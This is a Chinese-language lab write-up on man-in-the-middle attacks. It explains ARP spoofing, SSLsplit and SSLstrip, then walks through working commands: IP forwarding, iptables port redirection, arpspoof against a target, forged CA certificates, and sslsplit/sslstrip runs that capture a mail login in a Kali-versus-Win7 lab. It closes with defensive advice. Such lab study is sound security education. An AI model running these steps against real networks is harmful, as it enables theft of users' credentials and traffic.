原理
中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且在今天仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。
arp欺骗
- 攻击者可以根据用户与服务器之间ARP广播包,可以伪装成一方告诉另一方假地址来获取敏感信息。
- ARP欺骗是黑客常用的攻击手段之一,ARP欺骗分为二种:
- 对路由器ARP表的欺骗:截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。
- 对内网PC的网关欺骗:伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了网了,“网络掉线了”。
- arpspoof参数应用
- -i:指定网卡
- -t:目标机IP
- -r:kali网关地址
- SSLsplit
- 透明SSL/TLS中间人攻击工具
- 对客户端伪装成服务器,对服务器伪装成普通客户端
- 伪装服务器需要伪造证书
- 支持SSL/TLS加密的SMTP、POP3、FTP等通信中间人攻击
- SSLStrip
- SSLStrip 所能达成的目标是在客户端与服务器建立连接时,在MITM与Server之间形成HTTPS连接,而在Client与MITM之间形成HTTP连接。
- 结合arp地址欺骗,无需伪造证书
过程
- 默认情况下电脑是没有路由转发功能的,要想实现中间人攻击,要先启动路由
echo 1 > /proc/sys/net/ipv4/ip_forward,也可以输sysctl -w net.ipv4.ip_forward=1
- 接着,要对端口转发规则进行设置。
- 使用
iptables -t nat -L查看nat表中的规则
确认80端口和443端口没被使用后设置规则
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 //HTTP iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443 //HTTPS iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 //MSA iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 //SMTPS iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 //IMAPS iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 //POP3S
arp欺骗
- kali:192.168.19.130
- Win7:192.168.19.133
- 输入
arpspoof -i eth0 -t 192.168.19.133 -r 192.168.19.2
- 在Win7查看欺骗前后的变化
SSLsplit
- 使用openssl创建证书私钥:
openssl genrsa -out ca.key 2048 - 使用openssl创建证书:
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt - 在keli创建/root/test和/root/test/logdir文件夹保存记录。
- 安装sslsplit:从gitHub上下载源码
git clone https://github.com/droe/sslsplit.git /opt/sslsplit - 安装还需要两个包,使用
apt-get install libssl-dev libevent-dev进行安装 - 进入/opt/sslsplit使用
make``````make install进行编译。 - 启动SSLsplit监听端口
sslsplit -D -l connect.log -j /root/test -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
- Win7访问https连接,页面显示证书有问题,点击查看证书,发现证书已经被替换为刚刚生成的证书
- 同时,kali获得Win7正在访问的网站的证书信息
- 攻击者可以截获目标机上的会话信息,是类似wireshark的作用
sslstrip攻击
- 前面已经使用arpspoof将流量进行重定向
- 使用
sslstrip –l 8080监听发往8080端口的数据 - 测试百度网站失败
- 测试淘宝网站失败
- 启用sslstrip前,进入126邮箱首页,输入“http”会自动跳转为“http”,启用sslstrip后,页面一开始会提示网络连接失败,当再次刷新的时候,页面变为“http”连接,kali街渠道用户名和口令。
总结
中间人攻击是较为隐蔽的社会学攻击,中间人攻击会使用户觉得可能只是网络不好使得网页加载缓慢或需要刷新,如果用户没有注意到使用的是http协议或者没有注意到证书的问题,就可能被截取用户名和口令。因此,在日常生活中,对一些网银、购物、邮箱等网站要养成手动输入https协议的习惯,多注意细节,就能尽可能避免被攻击。